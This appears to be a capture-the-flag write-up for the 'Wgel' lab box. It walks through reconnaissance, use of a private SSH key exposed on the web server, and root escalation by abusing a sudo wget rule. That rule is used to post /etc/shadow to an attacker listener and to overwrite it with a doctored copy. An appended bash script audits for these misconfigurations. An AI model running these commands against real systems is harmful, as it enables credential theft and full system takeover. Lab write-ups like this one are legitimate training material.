some notes

Wgel CTF

Target IP: 10.10.225.134

Nmap gave us two open ports:

22/tcp open ssh  OpenSSH 7.2p2
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

Let's check the site. It is the Apache default page.

There are some high-risk vulnerabilities known for this Apache version.

Gobuster gave us some interesting results. We have found the sitemap directory.

Now I ran gobuster against the sitemap directory:

/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.192.81/sitemap/.ssh/]
/css                  (Status: 301) [Size: 318] [--> http://10.10.192.81/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.192.81/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.192.81/sitemap/images/]
/js                   (Status: 301) [Size: 317] [--> http:///sitemap/js/]

This is what gobuster found. Most interesting for me right now is the .ssh folder. Let's just open it in the browser.

Man! Looks like we got the private key.

I tried to connect, but it would be better if we had the username too. Let's see what we have in the images folder. Obviously there are a lot of images there.

I gave id_rsa the right permissions (chmod 600), but when I try to connect it still asks for a password, because we do not know which user the key belongs to yet.

If we go to http://$target_ip and open the page source, we can find the name Jessie in the comments. Let's try that name to connect over SSH.

And here we go. In the Documents dir we can find the user's flag.

Now we need to become root.

I am going to use find / -perm -u=s -type f 2>/dev/null to check whether there are any suspicious SUID files.

sudo -l gave us some information.

https://gtfobins.github.io/gtfobins/wget/#sudo I found what we need on this website: wget can be run with sudo, so it can read and write files as root.

We are going to overwrite the /etc/shadow file.

First we run a listener on our machine: nc -lvp 80
Then, on the target, we use wget to send the contents of /etc/shadow to our listener: sudo wget --post-file=/etc/shadow 10.2.38.40
Copy the content from the listener and create a new file named shadow on the local machine.

Now we need to create a password hash for our root user. The command openssl passwd -6 -salt 'salt' 'password' creates a SHA-512 crypt hash manually.

Another method is to use this command: mkpasswd --method=SHA-512 --stdin

I created the hash and I am going to write it into the local shadow file as the password for the root user.

Shadow file, root user line edited with the new hash.

Now we can start python3 -m http.server on our machine (it listens on port 8000) and then wget the new shadow file from the target.

Command to overwrite the shadow file with wget: sudo wget http://10.2.38.40:8000/shadow -O /etc/shadow

Now we can try to switch to the root user with su and the password we set. And here we go!

Take the flag and go to sleep :)
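Added defender-side check (my own example, not part of the box or the writeup): a small bash audit that flags the two misconfigurations this box turns on, a sudo rule granting wget (which GTFOBins lists as a file read/write primitive) and SSH keys sitting in a web root. The sudoers line and directory layout used in the test are constructed; the default paths are hypothetical.

```bash
#!/usr/bin/env bash
# Audit helper (constructed example). Two checks:
#   1. sudo rules that hand a downloader (wget/curl) to any user: with
#      sudo, wget --post-file reads files as root and wget -O writes them.
#   2. .ssh directories or key files reachable under a web root.
# Default paths are hypothetical; pass your own as arguments.

# Print each offending rule and return 0 if a sudoers-style file grants
# wget or curl; return 1 if the file is clean.
check_sudoers_downloaders() {
  local sudoers="${1:-/etc/sudoers}"
  local found=1
  while IFS= read -r line; do
    case "$line" in
      ''|\#*|Defaults*) continue ;;   # skip blanks, comments, Defaults
    esac
    # match /path/wget, /path/curl, or a bare wget/curl in a user rule
    if printf '%s\n' "$line" | grep -Eq '(^|[[:space:]/])(wget|curl)([[:space:]]|$)'; then
      printf 'sudo grants a downloader: %s\n' "$line"
      found=0
    fi
  done < "$sudoers"
  return "$found"
}

# Print matches and return 0 if the web root exposes .ssh dirs or key
# files (id_*, *.pem); return 1 if nothing is found.
check_webroot_keys() {
  local root="${1:-/var/www/html}"
  local hits
  hits=$(find "$root" \( -type d -name .ssh -o \
         -type f \( -name 'id_*' -o -name '*.pem' \) \) 2>/dev/null)
  [ -n "$hits" ] || return 1
  printf 'exposed in web root:\n%s\n' "$hits"
  return 0
}
```

Fixes are the usual ones: drop the wget rule from sudoers (or restrict it to a wrapper that cannot take -O or --post-file), and keep keys out of anything Apache serves.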